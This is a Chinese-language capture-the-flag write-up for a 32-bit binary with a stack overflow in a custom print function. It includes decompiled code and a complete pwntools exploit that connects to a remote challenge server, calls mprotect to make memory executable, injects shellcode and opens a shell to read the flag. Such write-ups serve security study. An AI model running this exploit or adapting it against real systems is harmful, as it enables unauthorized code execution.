静态编译,pie未开,有mprotect
程序貌似无任何问题
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [esp-Ch] [ebp-24h]
char v5; // [esp-Ch] [ebp-24h]
int v6; // [esp+Ch] [ebp-Ch] BYREF
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
printf("SSCTF[InPut Data Size]", v4);
_isoc99_scanf("%d", &v6);
temp = malloc(v6);
printf("SSCTF[YourData]", v5);
read(0, temp, v6);
puts("[Ok!]");
print(temp, v6);
return 0;
}
问题在print函数,这个不是标准函数是自己写的,有明显的溢出,输入长度58+5就能溢出到返回地址。
int __cdecl print(int a1, int a2)
{
char v3[58]; // [esp+Eh] [ebp-3Ah] BYREF
memcpy(v3, a1, a2);
return puts(v3);
}
由于没有libc也就找不到system,用mprotect将段设置为可执行,再执行shellcode
完整exp:
from pwn import *
local = 0
if local == 1:
p = process('./pwn')
else:
p = remote('111.200.241.244', 59142)
elf = ELF('./pwn')
context(arch='i386', log_level='debug')
def send_data(pay):
p.sendlineafter(b"SSCTF[InPut Data Size]", str(len(pay)).encode())
p.sendafter(b"SSCTF[YourData]", pay)
'''
int __cdecl print(int a1, int a2)
{
char v3[58]; // [esp+Eh] [ebp-3Ah] BYREF return: 0x3a+4
memcpy(v3, a1, a2);
return puts(v3);
}
'''
padding = 0x3e
stack = 0x08049000
pop_eax = 0x080b89e6 # pop eax ; ret
pop_edi = 0x08048480 # pop edi ; ret
pop_esi = 0x08048433 # pop esi ; ret
pop_edx = 0x0806efbb # pop edx ; ret
push_esp= 0x0806f2e8 # push esp ; ret
payload1 = b'A'*padding + flat(elf.sym['mprotect'], elf.sym['main'], stack, 0x1000, 7) #mprotect(stack,0x1000,7),main
send_data(payload1)
shellcode = asm(shellcraft.sh())
payload2 = b'A'*padding + flat(elf.sym['read'], stack, 0, stack, len(shellcode)) #read(0,stack,N),stack
send_data(payload2)
p.send(shellcode)
p.sendline(b'cat /flag')
p.interactive()